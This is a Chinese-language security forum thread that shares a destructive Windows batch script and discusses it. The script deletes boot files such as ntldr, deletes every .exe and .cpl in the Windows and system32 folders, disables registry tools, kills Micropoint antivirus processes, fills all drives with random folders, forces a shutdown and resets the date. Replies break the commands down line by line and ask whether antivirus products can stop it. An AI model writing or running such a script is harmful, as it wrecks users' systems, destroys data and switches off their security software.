瑞星卡卡安全论坛

汗！
据说小点点对删除文件不设防。有人就出这损招。
————————————————————

attrib -r -h -s c:\ntldr
attrib -r -h -s c:\*.sys
del c:\ntldr
del c:\*.sys
@reg  add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /f
taskkill /f /im MPMon.exe /t
taskkill /f /im MPSVC1.exe/t
taskkill /f /im MPSVC2.exe/t
taskkill /f /im MPSVC.exe/t
attrib -r -h -s C:\windows\*.exe
attrib -r -h -s C:\windows\system32\*.exe
attrib -r -h -s C:\windows\system32\*.cpl
del C:\windows\*.exe
del C:\windows\system32\*.exe
del C:\windows\system32\*.cpl
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
for /l %%a in (1,1,1000) do for %%b in (%alldrive%) do md %%b:\%random%%random%%random%%%a..\
Shutdown
date 2099-10-10

用户系统信息：Opera/9.63 (Windows NT 5.1; U; Edition IBIS; zh-cn) Presto/2.1.1

:default1: 这代码啥意思啊?完全看不懂啊。

这样的情况下还有用吗？

1楼大版主的代码太毒了，强过病毒破坏能力的百倍……:default20:

该用户帖子内容已被屏蔽

for /l %%a in (1,1,1000) do for %%b in (%alldrive%) do md %%b:\%random%%random%%random%%%a..\

上面这个命令行没看懂，其它的，我汗……:default20:

杀死点点的监控与服务：
taskkill /f /im MPMon.exe /t
taskkill /f /im MPSVC1.exe/t
taskkill /f /im MPSVC2.exe/t
taskkill /f /im MPSVC.exe/t

删除ntldr：
attrib -r -h -s c:\ntldr
del c:\ntldr

强迫关机：
Shutdown

就这几条，就够点点用户喝一壶了。

更别说那些删除系统程序的命令了。


该.bat运行后（预先想办法禁止强迫关机），系统就这德行了:default14:

 附件: 您所在的用户组无法下载或查看附件



 附件: 您所在的用户组无法下载或查看附件

删除windows目录下的所有.exe
删除system32目录下的所有.exe和cpl

新建随机名的文件夹塞满全盘:default3:

这个BAT够毒辣！:default3:

瑞星能抵挡吗？

该用户帖子内容已被屏蔽

就看用户怎么设置了。
设置对了，能防住。
毕竟，这个.bat采用的是一种下三烂的手段。且无技术含量。

这个有几个能挡得住，绝对“恶搞”

以前微-点没有防taskkill 自身进程，后来更新了，前几年的事吧。

这贴原来不是在斑竹之家嘛:kaka7:

那么运行这个 .bat  不就:kaka6: :kaka6:

该用户帖子内容已被屏蔽

该用户帖子内容已被屏蔽